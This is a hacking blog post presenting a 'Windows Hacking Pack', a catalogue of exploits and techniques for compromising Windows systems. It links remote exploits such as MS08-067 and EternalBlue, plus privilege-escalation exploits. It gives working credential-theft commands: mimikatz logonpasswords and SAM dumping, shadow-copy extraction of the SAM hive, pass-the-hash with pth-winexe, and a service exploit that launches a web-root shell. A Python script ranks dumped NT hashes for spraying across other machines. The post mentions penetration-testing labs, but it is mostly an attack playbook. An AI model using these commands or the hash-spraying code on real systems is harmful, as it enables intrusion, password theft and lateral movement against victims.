Windows exploit collection: Windows Hacking Pack – WHP | CortexHacker

19 September 2018

Windows exploit collection: Windows Hacking Pack – WHP


After a long search I found this collection of exploits for attacking the various Microsoft Windows systems. Some compromise the system remotely, some obtain administrator privileges after the initial compromise (privilege escalation), and some dump and save the victim's passwords. The vulnerabilities are all patched, but the exploits still work against machines that are not updated, and they can be used in your own penetration-testing lab.

The exploits, each with a link to its source

Remote Exploits For Windows Hacking Pack
=========================================
Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp

Windows NT / XP (before SP2)
MS03-026  Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit

Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvsvc, the Server service)
https://www.exploit-db.com/exploits/7104/

Windows 7 and Server 2008 R2 (x64), all service packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010

Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8
Privilege Escalation
======================
First, if you have meterpreter, it may be a good idea to try "getsystem".

srvcheck3.exe
================
Privilege escalation for Windows XP SP2 and before
This exploits services with weak permissions (upnphost / SSDPSRV). http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=============
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/

Other ways of exploits listed
==============================
Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE-2010-4398  Elevation of Privileges (UAC bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/

Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/

Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM

Backup copies of the SAM hive (check whether they exist)
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM
The running system keeps the hive locked; tools that can still read it: pwdump, samdump, samdump2, Cain&Abel
Otherwise (offline copy, repair backup) just copy it. Take the SYSTEM hive from the same directory as well: its boot key is needed to decrypt the hashes.

Dump SAM through a shadow volume
If a shadow copy can be created, the hive can be copied out of it while the live one stays locked.
Vista command: vssadmin create shadow /for=C: (the create subcommand ships on Server editions; on client editions the Win32_ShadowCopy WMI class can create one)
Server 2008 command: diskshadow
Then copy from the shadow device, e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM (and SYSTEM)

Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).

Mimikatz dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)

SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/
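Before spraying a dump with keimpx it helps to triage the pwdump lines first: blank passwords, accounts that still store an LM hash, and NT hashes shared between accounts (one reused password). The Python below is an added example written for this page; it is not part of WHP or of keimpx. The dump lines in it are constructed, not taken from any real system, and the function names are the example's own.

```python
"""Triage a pwdump/fgdump-style SAM dump before spraying the hashes.

Added example, not part of the WHP pack or of keimpx. The dump lines are
constructed for illustration and do not come from a real system; the
function names are this example's own.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in pwdump format: user:rid:lmhash:nthash:::
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1002:e52cac67419a9a224a3b108f3fa6cb6d:3d9c1d3ad4e8ce4c9b6ee0e7aa5c6fbd:::
broken line without enough fields
"""


def parse_pwdump(text):
    """Return a list of (user, rid, lm, nt) from pwdump lines; skip malformed ones."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            continue  # not two 32-hex-char hashes: ignore the line
        entries.append((user, rid, lm, nt))
    return entries


def triage(entries):
    """Classify accounts the way you would before spraying with keimpx or pth-winexe."""
    by_nt = defaultdict(list)
    for user, _rid, _lm, nt in entries:
        by_nt[nt].append(user)
    return {
        # blank password: no hash needed, just log in
        "blank_password": [u for u, _, _, nt in entries if nt == EMPTY_NT],
        # LM hash stored: crackable offline (case-insensitive, two 7-char halves)
        "lm_stored": [u for u, _, lm, _ in entries if lm != EMPTY_LM],
        # same NT hash on several accounts: one password reused, prime spray candidate
        "reused": {nt: users for nt, users in by_nt.items()
                   if len(users) > 1 and nt != EMPTY_NT},
        # built-in Administrator (RID 500) is the classic pass-the-hash target
        "rid500": [u for u, rid, _, _ in entries if rid == 500],
    }


def spray_candidates(entries):
    """NT hashes worth trying against other hosts/domain accounts, most-shared first."""
    t = triage(entries)
    ranked = sorted(t["reused"].items(), key=lambda kv: -len(kv[1]))
    hashes = [nt for nt, _ in ranked]
    for _user, rid, _lm, nt in entries:
        if rid == 500 and nt not in hashes and nt != EMPTY_NT:
            hashes.append(nt)
    return hashes


if __name__ == "__main__":
    ents = parse_pwdump(SAMPLE_DUMP)
    for key, val in triage(ents).items():
        print(key, val)
    print("spray order:", spray_candidates(ents))
```

The order matters in practice: a hash shared by several local accounts is usually a build image or helpdesk password and is the one most likely to open other machines, so it goes first; the RID 500 hash follows.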

LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip

PassTheHash (before Windows 8.1)
pth-winexe --user='pc.local/Administrator%aad3b435b51404eeaad3b435b51404ee:<NT hash, 32 hex chars>' //10.1.1.1 cmd
(format is DOMAIN/user%LMHASH:NTHASH; aad3b435b51404eeaad3b435b51404ee is the empty LM hash, used when LM storage is disabled)

PassTheTicket (Kerberos)
mimikatz can do it (kerberos::ptt with an exported ticket)

Duplicate Access Tokens (if admin access token can be used, it's win)
http://sourceforge.net/projects/incognito/

Token "Kidnapping"
MS09-012, Churrasco.bin shell.bin (runs shell.bin as NT AUTHORITY\SYSTEM)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html

Other notable tools
psexec, smbshell, metasploit’s psexec, etc
https://github.com/BloodHoundAD/BloodHound - It allows to visualize connections in an AD domain and find fast escalation ways.


To Be Added
==============
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade
